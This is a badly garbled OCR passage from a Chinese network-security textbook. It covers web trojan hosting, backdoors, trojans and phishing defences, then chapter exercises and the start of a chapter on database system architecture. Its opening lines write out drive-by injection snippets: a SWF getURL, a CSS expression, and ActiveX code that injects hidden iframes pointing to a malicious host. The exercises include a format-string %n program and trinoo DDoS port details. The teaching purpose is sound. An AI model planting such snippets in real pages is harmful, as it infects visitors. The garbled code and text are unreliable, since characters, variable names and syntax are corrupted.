,wf 挂 马 在 xxx. swf 中 添加 getURL ("http://www. xxx. com"，_blank), http:/www. xxx. 
com 是 恶意 连接 地 址 
挂 马 hytop:e-xpression( top. document. body. innerHTML= top. docment. body. 
wi 后 
风 计 汪 innerHTML+ <iframe src= "http://www. xxx. com">< /iframe> 
软件 漏洞 挂 马 if(new ActiveXObject("baidubar. Tool. 1"))docment. write(<iframe src= "http:// 
:漏洞 挂 马 


www. xxx. cn/img/baidu. gi" 们 一 /iframe 二 ) 百 度 溢出 漏洞 代码 等 很 多 


创建 后 门 是 为 了 给 以 后 的 入 侵 打开 一 个 缺口 ,使 人 侵 者 能 卷土重来 ,主要 工作 有 : 创建 
具有 特权 用 户 权限 的 虚假 用 户 账号 ;安装 批 处 理 或 远程 控制 工具 ;使 用 木马 程序 替换 系统 程 
序 ; 安 装 监控 程序 ;感染 启动 文件 等 。 

木马 实施 攻击 的 步骤 有 : 

(1) 配置 木马 服务 端 并 伪装 信息 反馈 。 

(2) 植 人 木马 ,方式 一 般 分 为 主动 传播 (具有 蠕虫 和 病毒 的 功能 ) 和 被 动 传播 (被 动 点 
击 、 下 载 后 运行 安装 )。 

(3) 启动 木马 ,分 为 立即 启动 和 随 系统 启动 。 

(4) 建立 连接 。 

(5) 远程 控制 。 

木马 防御 请 参见 第 2 章 恶意 代码 。 


8.8 网 络 钓鱼 


网 络 钓 鱼 (Phishing) 是 一 种 “语义 攻击 ”。 攻 击 者 利用 社会 工程 学 ,使 用 欺骗 性 的 电子 
邮件 、 伪 造 的 Web 站 点 和 欺骗 性 的 通信 内 容 来 进行 网 络 诈骗 活动 。 

网 络 钓鱼 是 通过 发 送 声称 来 自 于 管理 员 ,银行 或 其 他 知名 机 构 的 欺骗 性 信息 或 邮件 ,或 
者 伪装 成 其 Web 站 点 流行 的 吸引 眼球 的 信息 ,意图 引诱 收 信 人 或 网 站 浏览 者 点 击 , 同 时 下 
载 木马 或 要 求 给 出 敏感 信息 (如 用 户 名 口令、 账号 ID、.ATM PIN 码 或 信用 卡 详细 信息 ) 的 
一 种 攻击 方式 。 受骗 者 往往 会 泄露 自己 的 私人 资料 ,如 信用 卡号 ,银行 卡 账户 和 身份 证 号 等 
内 容 。 诈 骗 者 通常 会 将 自己 伪装 成 网 络 银行 、 在 线 零 售 商 和 信用 卡 公司 、 网 络 亲友 等 可 信 的 
网 络 客户 端 ,骗取 用 户 的 私人 信息 。 

钓鱼 攻击 的 成 功 取决 于 用 户 对 一 个 信息 如 一 封 电子 邮件 或 一 个 网 页 的 理解 方式 和 该 信 
息 实际 结果 间 的 差异 。 典 型 的 钓鱼 攻击 方法 如 下 : 

(1) 假冒 网 站 。 攻 击 者 建立 起 域名 和 网 页 内 容 都 与 真正 网 上 银行 系统 、 网 上 证 券 交易 
平台 极为 相似 的 网 站 ,引诱 用 户 输入 账号 .密码 等 信息 ,进而 通过 真正 的 网 上 银行 .网 上 证 券 
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系统 或 者 伪造 银行 储蓄 卡 ,证 券 交易 卡 盗窃 资金 。 

(2) 欺诈 邮件 。 攻 击 者 以 垃圾 邮件 的 形式 大 量 发 送 欺 诈 性 邮件 ,这 些 邮件 多 以 中 奖 、 顾 
问 和 对 账 等 内 容 引 诱 用 户 在 邮件 中 填 入 金融 账号 和 密码 ,或 是 以 各 种 紧迫 的 理由 要 求 收 件 
人 登录 某 网 页 提交 用 户 名 、 密 码 .身份 证 号 和 信用 卡号 等 信息 ,继而 盗窃 用 户 资金 。 

(3) 虚假 电子 商务 。 攻 击 者 在 比较 知名 、 大 型 的 电子 商务 网 站 发 布 虚 假 的 商品 销售 信 
息 ,犯罪 分 子 在 收 到 受害 人 的 购物 汇款 后 就 销声匿迹 。 

(4) 假冒 通信 工具 上 的 亲友 。 攻 击 者 利用 QQ .MSN 其 至 手机 短信 等 即时 通信 方式 欺 
骗 用 户 ,冒充 软件 运营 商 管理 员 告 诉 某 用 户 中 奖 或 者 免费 获得 游戏 币 等 ,通过 移动 服务 收取 
信息 费 。 

(5) 网 页 信息 欺骗 引诱 点 击 。 攻 击 者 利用 网 络 传播 隐藏 有 木马 或 黑客 工具 的 信息 , 吸 
引用 户 点 击 安装 植 人 木马 。 

防御 网 络 钓鱼 ,可 以 采用 以 下 措施 : 

(1) 尽量 不 通过 链接 打开 网 页 ,而 是 直接 输入 域名 访问 网 络 。 

(2) 对 于 需要 输入 账号 和 密码 的 网 站 ,再 三 确认 网 站 的 正确 性 。 

(3) 给 网 络 浏览 器 程序 安装 补丁 ,使 其 补丁 保持 在 最 新 状态 。 

(4) 禁止 浏览 器 运行 JavaScript 和 ActiveX 代码 。 

(5) 谨慎 打开 可 疑 邮件 或 附件 。 

(6) 利用 已 有 的 防 病毒 软件 ,实时 防御 钓鱼 网 站 。 

(7) 对 整 脚 或 模糊 的 语言 语义 须 确 认 。 

(8) 对 中 奖 信 息 或 优惠 信息 不 要 轻信 。 

(9) 对 网 络 上 的 朋友 借 钱 .代购 .紧急 求助 等 信息 需 确 认 。 


本 章 小 结 


“黑客 "是 一 个 精通 计算 机 技术 的 特殊 群体 ,分 为 三 类 : 破解 者 (Crackers)、“ 骇 客 
(Hackers)” 和 “人 入侵 者 (Intruder)”。 

黑客 行为 包括 寻找 系统 漏洞 ,获取 口令 .账号 攻击 、 放 置 木马 .Web 欺骗 .电子 邮件 攻 
击 、 网 络 节 点 攻击 、 网 络 监听 和 偷 取 特权 等 。 

黑客 攻击 的 一 般 步 骤 和 过 程 包括 收集 信息 .入 侵 攻击 、 提 升 权限 .窃取 资料 .保持 访问 、 
掩 迹 和 拒绝 服务 攻击 等 。 

黑客 利用 一 些 工具 和 技术 收集 信息 ,进行 信息 查询 、 嗅 探 与 监听 、 扫 描 和 查 点 。 入 侵 攻 
击 包括 口令 攻击 、 缓 冲 区 溢出 攻击 ,格式 化 字符 串 攻 击 和 欺骗 攻击 等 。 欺 骗 攻 击 也 可 以 发 生 
在 信息 收集 阶段 ,欺骗 攻击 包括 IP 欺骗 .TCP 会 话 支持 .ARP 欺骗 .DNS 欺骗 和 Web 欺骗 
等 类 型 。 权 限 提升 是 发 生 在 入 侵 成 功 之 后 ,使 入 侵 得 到 的 一 般 账号 置换 或 提升 为 管理 员 账 
号 ,获得 系统 的 完全 访问 权限 。 人 窃取 目标 系统 中 的 重要 数据 资料 是 黑客 攻击 的 目标 。 对 入 
侵 的 系统 植 入 木马 后 门 以 保持 访问 ,方便 以 后 的 再 次 入 侵 。 通 过 改写 日 志 等 掩盖 黑客 的 攻 
击 痕迹 。 拒 绝 服务 攻击 是 黑客 人 侵 失 败 的 攻击 手段 ,是 利用 合理 的 服务 请 求 来 占用 过 多 的 
服务 资源 ,使 得 目标 系统 因 遭 受 某 种 程度 的 破坏 而 不 能 继续 提供 正常 的 服务 ,甚至 导致 物理 
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上 的 瘫痪 或 骨 溃 。 
网 络 钓鱼 (Phishing) 是 一 种 “语义 攻击 ”。 攻 击 者 利用 社会 工程 学 ,使 用 欺骗 性 的 电子 
邮件 、 伪 造 的 Web 站 点 和 欺骗 性 的 通信 内 容 来 进行 网 络 诈骗 活动 。 


习题 8 


8.1 收集 资料 ,比较 下 列传 输 介质 上 信息 被 监听 的 机 会 和 可 能 性 。 
(1) 以 太 网 ; (2) 令 牌 网 ; (3) 电 话 网 ;(4) 有 线 电视 网 ;(5) 微 波 和 无 线 电 。 

8.2 尽 可 能 多 地 收集 Sniffer 产品 数据 ,进行 比较 分 析 , 分 别 指出 它们 的 使 用 方法 和 防范 

措施 。 

介绍 一 种 扫描 工具 的 用 法 ,记录 扫描 结果 并 对 扫描 结果 进行 分 析 。 

试用 工具 生成 一 个 口令 字典 。 

两 人 试 在 UNIX 系统 上 进行 一 次 口令 攻击 对 抗 。 

两 人 试 进行 一 次 网 络 服务 口令 攻击 对 抗 。 

下 载 一 个 进行 缓冲 区 溢出 攻击 的 程序 ,进行 分 析 。 

阅读 下 面 的 程序 ,指出 其 功能 。 

#include< stdio.h> 

int main (int argc, char * argv[]) 

{ 


Ee dt 
Ow 


unsigned char carnary[5]; 
unsigned char fo0[4]; 
memset (foo, '\x00', sizeof (f00)); 
strcpy (camary, "XXXX") 7 
fprintf (stderr, "%16usn%16usn%32%n%64usn\n", 
(int * ) &foo[0],1, (int* ) &foo[1],1 , (int* ) &foo[2],1, (int* ) &foo[3]); 
printf ("foo|lcarmary: %02x%02x%02x%02x|%02x%02x%02x%02x\n", 
foo[0], fo00[1], fo00[2], fo0[3], 
camary[0], camary[1], camary[2], camary[3]; 
} 
9 试 分 析 路 由 欺骗 的 原理 ,并 与 ARP 欺骗 和 DNS 欺骗 进行 比较 。 
10 查找 资料 , 写 出 三 种 网 络 炸 弹 的 攻击 原理 和 防御 方法 。 
11 在 实验 室 中 模拟 一 次 SYN Flood 攻击 的 实际 过 程 。 
12 在 DDoS 中 ,为 什么 黑客 不 直接 去 控制 攻击 佛 介 机 ,而 要 从 控制 便 儒 机 上 转 一 下 呢 ? 
13 在 http://www. fbi. gov/nipc/trinoo. htm 上 有 一 个 检测 和 根除 trinoo 的 自动 程序 。 
请 下 载 并 试用 一 次 。 
8.14 trinoo DDoS 有 下 面 一 些 基本 特性 ,请 根据 这 些 特 点 提出 抵御 trinoo 的 策略 。 
(1) 在 master 程序 与 代理 程序 的 所 有 通信 中 ,trinoo 都 使 用 了 UDP 协议 。 
(2) trinoo master 程序 的 监听 端口 是 27655 ,攻击 者 一 般 借助 telnet 通过 TCP 连接 
到 master 程序 所 在 计算 机 。 
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(3) 所 有 从 master 程序 到 代理 程序 的 通信 都 包含 字符 串 "144" ,并 且 被 引导 到 代理 
的 UDP 端口 27444。 
(4) master 和 代理 之 间 通 信 受 到 口令 的 保护 ,但 是 口令 不 是 以 加 密 格式 发 送 的 ,因此 
它 可 以 被 “ 嗅 探 ? 到 并 被 检测 出 来 。 
8.15 在 网 络 上 下 载 2 或 3 个 DDoS 监测 软件 ,安装 到 自己 的 机 器 上 ,记录 其 工作 过 程 。 
8.16 总 结 防御 DDoS 攻击 的 方法 。 
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数据 库 安全 是 随 着 数据 管理 技术 和 信息 安全 技术 不 断 发 展演 化 而 逐渐 形成 的 一 个 越 来 
越 重 要 的 安全 学 科 分 支 。 


9.1 数据 库 系 统 简 介 


在 当今 和 未 来 的 信息 社会 中 ,一 切 信息 都 可 以 转变 成 为 数据 。 数 据 库 系统 是 高 效 存储 、 
管理 ,使 用 和 维护 数据 的 集约 式 平台 ,信息 是 人 们 关心 和 使 用 不 同 数据 的 真正 原因 。 


9.1.1 数据 库 概念 


数据 ,数据 库 .数据库 管理 系统 .数据 库 应 用 系统 和 数据 库 系 统 是 数据 管理 中 经 常 使 用 
且 密切 相关 的 5 个 基本 概念 。 

在 形式 上 ,数据 是 描述 客观 事物 的 符号 记录 。 就 实质 而 言 ,数据 是 表示 客观 事物 的 语义 
解释 。 数 据 管理 指 的 是 对 数据 的 收集 、 组 织 .编目 、 定 位、 存储 ,检索 ,抽取 、 表 示 、 加 工 \ 传 播 
和 维护 等 一 系列 行为 操作 ,围绕 用 户 日 常 活动 ,针对 二 进 制 机 器 数据 展开 。 自 从 1946 年 第 
一 台电 子 计算 机 诞生 后 ,数据 管理 先后 经 历 了 人 工 管理 阶段 .文件 系统 阶段 ,并 最 终 进入 了 
数据 库 系统 阶段 。 历 经 40 多 年 理论 与 实践 的 变革 创新 ,数据 库 系 统 已 经 成 为 软件 工程 领域 
最 引 人 注 目的 成 就 ,是 人 们 数字 化 生存 的 重要 组 成 部 分 。 

数据 库 (Database,DB) 是 逻辑 相关 数据 的 一 个 持久 性 共享 集合 ,含有 数据 自身 的 定义 
与 描述 ,用 于 实现 各 种 数据 管理 。 根 据 这 种 定义 ,数据 库 的 基本 特点 是 集中 存储 大 量 数据 
项 ,允许 数据 项 之 间 存 在 不 同 层次 和 规模 的 依赖 .确保 数据 宛 余 量 小 、 提 供 方便 可 靠 的 资源 
共享 .具有 规范 的 数据 字典 或 元 数据 、 支 持 丰富 多 彩 的 数据 管理 。 

数据 库 按照 一 定 的 数据 模型 组 织 .描述 和 存储 数据 , 减 小 数据 元 余 度 ,保障 数据 独立 性 ， 
提高 数据 扩展 性 。 数 据 库 文 件 由 记录 (Record) 组 成 ,每 个 记录 包含 了 一 组 相关 的 数据 。 每 
个 记录 包含 域 (Field) 或 元 素 (Element) , 即 它们 的 基本 数据 页 。 

由 于 应 用 程序 是 通过 DBMS 间接 存 取 数据 库 中 的 数据 ,数据 库 的 数据 具有 独立 性 和 完 
整 性 特性 。 数 据 独 立 性 是 指数 据 与 程序 间 的 互 不 依赖 性 ,一 般 分 为 物理 独立 性 与 钦 辑 独立 
性 。 物 理 独 立 性 是 指数 据 库 物 理 结构 的 改变 不 影响 逻辑 结构 及 应 用 程序 。 逻 辑 独立 性 是 指 
数据 库 逻 辑 结构 的 改变 不 影响 应 用 程序 。 数 据 完整 性 包括 数据 的 正确 性 有 效 性 和 一 致 性 。 

数据 库 管 理 系 统 (Database Management System,DBMS) 是 位 于 操作 系统 之 上 的 一 层 
数据 管理 软件 ,可 以 对 数据 库 的 建立 .运用 和 维护 进行 集中 管理 .集中 控制 。 数 据 库 管 理 系 
统 为 数据 定义 和 数据 操纵 提供 了 方便 快捷 ,并 能 够 保证 数据 的 安全 性 完整 性 .并 发 性 和 可 
恢复 性 。 

数据 库 应 用 系统 (Database Application System,DBAS) 由 数据 库 管理 开发 工具 .应 用 
系统 数据 管理 员 和 用 户 构成 ,是 应 用 开发 人 员 根 据 数据 管理 员 的 要 求 和 用 户 应 用 的 需求 开 
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发 的 应 用 系统 。 

数据 库 系 统 (Database System,DBS) 是 数据 库 ,数据库 管 理 系统 .数据 库 应 用 系统 的 有 
机 结合 ,一般 由 数据 库 管理 员 进 行 管理 和 维护 。 在 很 多 场合 ,人 们 经 常 把 数据 库 系 统 简称 为 
数据 库 。 

数据 管理 员 (Data Administrator, DA) 是 管理 者 而 不 是 技术 人 员 ,该 角色 正在 逐渐 由 首 
席 信息 官 CIO 取代 。 其 职责 是 管理 数据 资源 ,包括 对 数据 的 标准 与 规模 ,访问 管理 的 规则 、 
策略 和 过 程 进行 规划 ,设计 和 维护 ,建立 全 局 数据 模型 ,设计 和 开发 概念 /逻辑 数据 库 , 与 数 
据 库 管理 员 和 应 用 程序 开发 人 员 进 行 交流 ,确保 满足 已 声明 的 需求 ,管理 数据 字典 ,建立 安 
全 规则 ,培训 用 户 等 。 

数据 库 管 理 员 (Database Administrator, DBA ) 负 责 数据 库 的 物理 实现 ,包括 评价 和 选 
择 DBMS 产品 ,物理 数据 库 设计 和 实现 ,安全 性 和 完整 性 控制 系统 维护 ,性 能 分 析 和 优化 ， 
定期 进行 备份 ,负责 系统 测试 .运行 和 恢复 ,培训 用 户 等 。 数 据 库 管理 员 更 加 偏向 技术 。 在 
有 些 组 织 机 构 中 ,数据 管理 员 和 数据 库 管理 员 没 有 明显 的 区 别 。 

在 数据 库 设 计 过 程 中 会 出 现 两 种 类 型 的 设计 人 员 : 概念 /逻辑 数据 库 设计 人 员 和 物理 
数据 库 设 计 人 员 。 前 者 负责 标识 数据 模型 数据 关联 和 条 件 约束 等 内 容 , 着 重 从 商务 规则 、 
业务 逻辑 角度 理解 分 析 数 据 。 后 者 负责 把 概念 /逻辑 数据 库 设 计 映 射 为 物理 实现 ,包括 模 
式 、 表 、 视 图 、 约 束 \ 存 储 结构 ,存储 过 程 、 访 问 方 式 和 安全 人 性 检查 等 内 容 , 充 分 依赖 于 目标 
DBMS 。 

应 用 开发 人 员 负 责 使 用 有 关 技 术 开 发 数据 库 应 用 程序 ,当前 采用 的 主要 技术 除 C++ 、 
Java 等 程序 设计 语言 外 ,还 有 第 四 代 语 言 .SQL 语句 和 各 种 数据 库 中 间 件 等 。 其 中 ,第 四 代 
语言 (4GL) 实 际 上 是 一 种 基于 组 件 的 可 视 化 编程 语言 ,典型 的 4GL 包括 QBE、 表 单 生成 器 、 
报表 生成 器 、 图 形 生成 器 和 应 用 程序 生成 器 等 。 另 外 ,常见 的 数据 库 中 间 件 包括 ODBC、 
JDBC 和 Hibernate 等 ,用 来 在 应 用 程序 和 真实 数据 库 之 间 建 立 一 层 可 配置 .可 移植 .易于 修 
改易 于 扩展 的 通用 软件 组 件 分 隔 层 。 

最 终 用 户 是 整个 数据 库 系统 的 客户 ,享受 数据 库 系统 提供 的 数据 服务 。 通 常 , 最 终 用 户 
通过 数据 库 应 用 程序 或 者 数据 库 系 统 软件 各 种 接口 与 数据 库 系统 进行 交互 。 


9.1.2 数据 库 系统 体系 结构 


尽管 不 同 数据 库 系 统 的 体系 结构 不 尽 相同 ,但 基本 上 和 数据 库 任务 组 DBTG 于 1975 
年 提出 的 ANSI/SPARC 三 层 体系 结构 一 致 ,从 上 至 下 分 为 三 层 ,分 别 是 外 模式 、 概 念 模式 
和 内 模式 ,如 图 9. 1 所 示 。 

外 模式 又 称 为 用 户 视图 、 子 模式 或 用 户 模式 ,描述 每 一 个 与 用 户 相关 的 数据 库 。 对 于 相 
同 数据 ,用 户 视图 可 以 采用 不 同 的 方式 表达 。 有 些 数据 甚至 并 不 真实 存在 ,通过 多 个 实体 动 
态 组 合 或 者 临时 导出 。 最 终 用 户 、 应 用 开发 人 员 数据库 设计 人 员 和 DBA 都 与 用 户 视图 有 
关 ,DBMS 也 负责 管理 用 户 视图 。 一 个 数据 库 可 以 有 多 个 用 户 视图 。 

概念 模式 又 称 为 公共 用 户 视图 或 逻辑 模式 ,描述 数据 库 中 存储 的 数据 及 其 关联 。 这 一 
层 包含 DBA 所 看 到 的 整个 数据 库 的 逻辑 结构 ,是 独立 于 存储 细节 的 数据 需求 的 完整 视图 。 
概念 模式 定义 并 记录 实体 、 实 体 属性 和 实体 关联 ,同时 包括 与 其 相关 的 数据 约束 ,数据 语义 、 
安全 性 和 完整 性 限制 。 数 据 库 设计 人 员 和 DBA 与 公共 用 户 视图 有 关 ,DBMS 也 负责 管理 
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应 用 开发 人 员 ”应 用 系统 1 应 用 系统 2 应 用 系统 n 


外 模式 。 上 如 下 | 
外 模式 概念 模式 映射 
概 人 模式 | [从 用 户 视 
DBA <、 概念 模式 (内 模式 史册 
内 模式 和 大 图 
EB 组 绢 
物理 数据 组 织 。 | 数据 床 | | 数据 床 | | 数据 床 | | 数据 床 | | 数据 应 


图 9.1 ANSI/SPARC 三 层 体系 结构 及 各 种 用 户 视图 


公共 用 户 视图 。 一 个 数据 库 只 有 一 个 公共 用 户 视图 。 

内 模式 又 称 为 存储 视图 或 存储 模式 ,是 数据 库 在 计算 机 环境 中 的 物理 表示 ,描述 数据 库 
如 何 存储 数据 。 存 储 视图 与 物理 数据 组 织 不 同 , 不 涉及 物理 记录 的 形式 ,定义 和 记录 数据 及 
索引 的 存储 空间 分 配 ,存储 记录 的 结构 和 大 小 .记录 位 置 , 数 据 压缩 和 数据 加 密 信 息 。 数 据 
库 设计 人 员 和 DBA 与 存储 视图 有 关 ,DBMS 也 负责 管理 存储 视图 。 一 个 数据 库 只 有 一 个 
存储 视图 。 

物理 数据 组 织 以 高 效 的 方式 存储 数据 ,建立 数据 库 。 数 据 库 在 存储 过 程 中 被 组 织 为 一 
个 或 多 个 文件 ,每 个 文件 包含 一 个 或 多 个 记录 ,每 个 记录 由 一 个 或 多 个 字段 组 成 。 一 般 来 
说 ,一 个 记录 对 应 于 一 个 实体 ,一 个 字段 对 应 于 一 个 属性 。 常 见 的 文件 组 织 方式 包括 堆 、 散 
列 、 索 引 顺序 访问 .B 十 树 和 簇 集 。 数 据 库 设计 人 员 和 DBA 与 物理 数据 组 织 有 关 ,DBMS 通 
常 不 直接 负责 管理 物理 数据 组 织 , 而 是 通过 OS 进行 管理 。 

DBMS 除了 负责 管理 三 层 模 式 外 ,还 负责 维持 这 三 类 模式 之 间 的 映射 ,以 确保 它们 的 
一 致 性 。 映 射 包括 外 模式 /概念 模式 映射 和 概念 模式 /内 模式 映射 ,分 别 确保 逻辑 数据 独立 
性 和 物理 数据 独立 性 。 逻 辑 数据 独立 性 指 的 是 外 模式 不 受 概念 模式 变化 影响 ,物理 数据 独 
立 性 指 的 是 概念 模式 不 受 内 模式 变化 影响 。 

从 ANSI/SPARC 体系 结构 中 可 以 看 出 ,DBMS 在 数据 库 系统 中 具有 至 关 重 要 的 作用 。 


9.1.3 关系 数据 库 管理 系统 


数据 库 管理 系统 是 数据 库 系 统 的 核心 ,是 为 数据 库 的 建立 .运用 和 维护 而 配置 的 软件 。 
它 位 于 操作 系统 之 上 ,负责 集中 管理 和 控制 数据 库 , 侦 听 、 接 收 、 解 析 、 执 行 用 户 或 应 用 程序 
发 出 的 各 种 数据 管理 命令 ,保证 数据 库 的 安全 性 和 完整 性 。 

1. 关系 数据 库 管理 系统 功能 

图 灵 奖 得 主 E. F. Codd 在 1982 年 总 结 了 关系 数据 库 管理 系统 (Relational DataBase 
Management System,RDBMS) 的 8 项 功能 。 通 常 认为 完整 的 DBMS 具备 如 下 10 项 功能 : 

(1) 数据 存储 、 提 取 和 更 新 。DBMS 最 基本 的 功能 对 用 户 通常 是 透明 的 。 为 了 提高 效 
率 ,需要 采用 合适 的 存 取 方 法 和 索引 策略 。 
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(2) 用 户 可 访问 的 目录 。 该 目录 用 于 为 用 户 提供 集中 的 数据 描述 信息 ,包含 模式 ,用户 
和 应 用 程序 等 各 种 元 数据 。 元 数据 是 关于 数据 的 数据 ,帮助 数据 生产 者 有 效 地 管理 和 维护 
数据 库 。 目 录 记 录 元 数据 ,信息 量 和 使 用 方式 因 DBMS 而 异 , 也 称 为 系统 目录 或 者 数据 字 
典 。 典 型 情况 下 记录 内 容 有 数据 项 的 名 称 、 类 型 和 大 小 、 关 联 的 名 称 数据 的 完整 性 约束 、 授 
权 访 问 数据 的 用 户 名 称 、 索 引 策 略 ,安全 策略 ,外 模式 /概念 模式 映射 概念 模式 /内 模式 映射 
( 表 与 视图 ) .事务 频率 、 对 象 访问 次 数 等 统计 量 。 

(3) 事务 支持 。 事 务 确保 所 有 更 新 操作 要 么 全 部 执行 ,要 么 一 个 都 不 执行 。 事 务 具 有 4 
个 重要 特性 , 即 原子 性 (Atomicity) ,一致 性 (Consistency)、 隔 离 性 (Isolation) 和 持久 性 
(Durability) ,简称 为 ACID。 可 串 行 化 处 理 是 事务 的 一 项 重要 任务 ,其 目标 是 确保 多 个 事务 
的 并 发 调度 结果 与 一 个 串 行 调度 结果 等 价 。 

(4) 并 发 控制 。 并 发 控制 确保 当 多 个 用 户 同时 更 新 数据 库 时 ,数据 库 状态 的 改变 与 按 
照 某 种 串 行 顺序 执行 更 新 事务 的 结果 一 致 。 常 用 的 并 发 控制 方式 包括 锁 、 时 间 惟 和 有 效 性 
验证 (也 称 为 乐观 并 发 控制 )。 

(5) 恢复 服务 。 恢 复 服务 确保 当 系统 崩溃 、 介 质 失 效 或 者 程序 发 生 错 误 时 能 够 恢复 到 
一 个 正确 一 致 的 状态 。 常 见 的 实现 方式 是 维护 日 志文 件 , 引 入 检查 点 。 

(6) 授权 服务 。 授 权 服务 确保 所 有 数据 访问 和 数据 处 理 都 与 用 户 和 程序 的 特殊 限定 一 
致 。 有 时 候 , 人 们 认为 数据 库 安 全 就 是 保护 数据 库 不 被 未 授权 者 访问 。 

(7) 支持 数据 通信 。DBMS 必须 能 够 与 通信 软件 集成 ,以 便 实 现 分 布 式 数据 管理 。 

(8) 完整 性 服务 。 完 整 性 服务 确保 数据 库 状 态 和 状态 改变 遵循 一 定 的 规则 ,通常 以 约 
束 形式 存在 ,分 为 应 用 无 关 完整 性 约束 和 特殊 应 用 完整 性 约束 两 种 类 型 。 应 用 无 关 完整 性 
约束 包括 实体 完整 性 .参照 完整 性 和 用 户 定 义 完 整 性 。 特 殊 应 用 完整 性 为 特殊 应 用 定制 , 例 
如 “雇员 薪水 不 能 减少 ”“ 经 理 不 能 同时 参与 两 个 部 门 管理 ”等 。 完 整 性 约束 还 可 以 用 来 保 
证 数据 质量 ,例如 数据 源 .数据 输出 和 数据 准确 性 等 。 

(9) 提高 数据 独立 性 服务 。 数 据 独 立 性 意味 着 在 三 层 体系 结构 中 ,对 较 低 层 的 修改 不 
能 影响 较 高 层 ,主要 表现 为 逻辑 数据 独立 性 和 物理 数据 独立 性 。 前 者 指 的 是 外 模式 不 受 概 
念 模式 变化 的 影响 。 后 者 指 的 是 概念 模式 不 受 内 部 模式 变化 的 影响 。 物 理 独立 性 比较 容易 
获得 ,完全 的 逻辑 数据 独立 性 很 难 达 到 。 

(10) 实用 程序 服务 。 实 用 程序 辅助 DBA 高 效 地 管理 数据 库 。 当 工作 发 生 在 内 模式 
时 ,只 能 由 DBMS 提供 ,常见 的 例子 有 从 平面 文件 中 导入 数据 库 、 将 数据 库 导出 到 平面 文 
件 、 监 控 数 据 库 使 用 和 运行 、 性 能 和 数据 统计 分 析 、 重 新 索引 、 无 用 单元 收集 和 重新 分 配 
机 制 。 

2. 关系 数据 库 管理 系统 的 组 件 

DBMS 系统 的 功能 可 以 通过 类 似 于 图 9. 2 所 示 的 组 件 实现 。 

各 部 分 组 件 名 称 及 其 主要 分 工 如 下 : 

(1) 查询 处 理 器 。 将 所 有 的 查询 转换 成 一 系列 数据 库 管 理 器 运行 指令 。 查 询 处 理 通常 
包括 4 个 主要 阶段 : 解析 ,优化 .代码 生成 和 代码 执行 。 

(2) 数据 库 管 理 器 。 与 应 用 程序 目标 代码 和 查询 处 理 进行 交互 ,负责 接收 查询 、 检 查 外 
模式 和 概念 模式 ,并 控制 文件 管理 器 动作 。 

(3) 文件 管理 器 。 操 纵 基本 文件 存储 ,并 且 分 配 和 管理 磁盘 存储 空间 。 
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应 用 程序 查询 数据 库 模式 
I 
1 1 1 
术 外 路 上 | 查询 处 理 器 DDL 编 译 器 
1 1 | 
程序 数据 库 数据 字典 
目标 代码 | “| 管理 器 管理 器 
I 二 
1 De 
访问 方法 |- 一 ~| 文件 管理 器 
系统 缓存 区 数据 库 和 
、 系 统 目录 


图 9.2 数据 库 管理 系统 的 主要 组 件 


(4) DML 预 处 理 器 。DML(Data Manipulation Language, 数 据 操纵 语言 ) 用 来 读 取 和 
更 新 数据 库 。 典 型 的 数据 操纵 处 理 包 括 数 据 的 插入 .修改 、 检 索 和 删除 等 。 DML 分 为 宿主 
型 和 自主 型 两 类 ,前 者 必须 嵌入 高 级 语言 ,后 者 可 以 独立 使 用 。 

(5) DDL 编译 器 。DDL(Data Defininon Language, 数 据 定义 语言 ) 用 来 说 明 各 种 数据 
库 模 式 。DDL 编译 结果 是 一 组 表 , 保 存在 数据 字典 里 。 理 论 上 每 层 模式 都 有 自己 的 DDL， 
实际 上 DDL 只 需 完整 定义 外 模式 和 概念 模式 即 可 。 

(6) 数据 字典 管理 器 。 又 称 为 目录 管理 器 ,控制 .维护 数据 字典 。 

其 中 ,数据 库 管理 器 与 安全 密切 相关 ,包括 下 列 组 件 : 

Q@ 授权 控制 。 检 查 用 户 的 访问 操作 权限 。 

@ 命令 处 理 器 。 获 取 授权 后 取得 数据 库 管理 控制 权 。 

@ 完整 性 检查 器 。 确 保 所 有 数据 库 操作 满足 完整 性 约束 。 

@ 查询 优化 器 。 确 定 执行 查询 时 的 最 佳 策略 ,许多 DBMS 采用 启发 式 处 理 策略 优化 
查询 。 

@ 事务 管理 器 。 接 收 .执行 和 监控 事务 。 

@ 调度 程序 。 确 保 数据 库 并 发 操作 运行 结果 正确 。 

@ 恢复 管理 器 。 实 现 数据 库 恢 复 功能 ,同时 负责 事务 的 提交 和 终止 。 

@ 缓冲 区 管理 器 。 负 责 在 内 存 和 外 设 之 间 缓 存 数据 。 与 恢复 管理 器 一 同 组 成 数据 管 
理 器 。 

3. 关系 数据 库 管理 系统 的 典型 工作 流程 

数据 库 系统 的 访问 控制 涉及 应 用 程序 .DBMS .操作 系统 和 硬件 等 多 方面 的 协同 工作 ， 
是 一 个 相当 复杂 的 过 程 ,DBMS 在 整个 过 程 中 承担 关键 的 中 介 作 用 。 以 应 用 程序 从 数据 库 
中 读 取 一 个 数据 为 例 ,数据 库 管理 系统 的 典型 工作 流程 如 下 : 

(1) DBMS 接收 用 户 或 应 用 程序 发 出 的 从 数据 库 中 读 取 数据 记录 的 命令 。 

(2) DBMS 检查 命令 语法 ,解析 语义 ,调用 应 用 程序 相对 视图 (外 模式 ) ,检查 存 取 及 控 
制 权限 ,决定 是 否 执行 处 理 命令 。 如 果 拒 绝 执行 处 理 命令 ,直接 返回 错误 信息 。 
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(3) DBMS 调用 公共 用 户 视图 (概念 模式 ) ,根据 外 模式 ,概念 模式 映射 ,确定 读 取 概 念 
模式 的 相关 记录 。 

(4) DBMS 调用 存储 视图 (内 模式 ) ,根据 概念 模式 ,内 模式 映射 ,确定 读 取 的 文件 , 存 取 
方式 和 具体 记录 。 

(5) DBMS 向 操作 系统 发 出 执行 读 取 有 关 物 理 记 录 的 命令 。 

(6) OS 执行 读 取 操作 。 

(7) OS 将 数据 从 数据 库 的 存储 区 送 至 系统 缓冲 区 。 

(8) DBMS 根据 外 模式 ,概念 模式 计算 应 用 程序 需要 的 记录 格式 。 

(9) DBMS 将 数据 从 系统 缓冲 区 送 到 应 用 程序 的 用 户 工作 区 。 

(10) DBMS 向 用 户 返 回 命令 执行 情况 的 状态 信息 。 

数据 的 更 新 .查询 和 删除 等 过 程 基本 上 与 上 面 的 流程 类 似 。 从 这 个 工作 流程 中 不 难 理 
解 ,数据 库 安 全 很 大 程度 上 与 DBMS 安全 有 关 。 


9.1.4 联机 分 析 处 理 


联机 分 析 处 理 (Onlin Analytical Processing,OLAP) 是 一 种 能 够 动态 综合 ,分 析 和 合并 
